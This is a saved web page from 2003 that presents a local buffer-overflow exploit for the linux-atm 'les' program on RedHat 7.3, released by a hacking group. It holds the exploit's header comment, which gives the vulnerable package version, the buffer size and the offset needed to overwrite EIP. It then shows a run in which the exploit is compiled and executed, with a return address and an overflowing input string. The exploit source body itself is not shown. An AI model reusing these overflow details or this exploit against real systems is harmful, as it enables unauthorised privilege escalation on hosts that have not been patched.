linux_atm_c.htm

Linux 下atm的本地溢出程序（问题出在les） redhat7.3测试通过

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0046)http://www.xfocus.net/tools/200305/linux_atm.c -->
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2800.1479" name=GENERATOR></HEAD>
<BODY><PRE>/*  ATM on linux Exploit
*** vulnerability discovered by Angelo Rosiello
*** sorry for my poor english.
*** i wrote this exploit just for fun.
*** i can't get a rootshell on my linux :(
*** tested on redhat7.3 ,other linux maybe OK,too.
*** atm package:linux-atm-2.4.0-1.i386.rpm
*** http://sourceforge.net/projects/linux-atm
***
*** Here is another exploit by Angelo Rosiello
*** But i can't get shell with this code
*** http://www.ph4nt0m.net/bbs/dispbbs.asp?boardID=21&amp;RootID=24028&amp;ID=24028

***************************************************

   Buffer is 244 bytes
   using 244+4 bytes to overwrite eip.

***************************************************
*** AUTOR:@Xis2(ph4nt0m)
*** CONTACT:axis@ph4nt0m.net
*** COPYRIGHT (c) 2003 PH4NT0M SECURITY
*** http://www.ph4nt0m.net
*** 2003.5.15
***************************************************

[tt@PH4NT0M explab]$ gcc -o linux_atm myatm.c
[tt@PH4NT0M explab]$ ./linux_atm
****************************************

linux-atm exploit!

Coded by @Xis2(ph4nt0m)
Welcome to http://www.ph4nt0m.net

Jump to 0xbffffa5c
****************************************


DEBUG: Log opened
NOTE: Configuration file: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?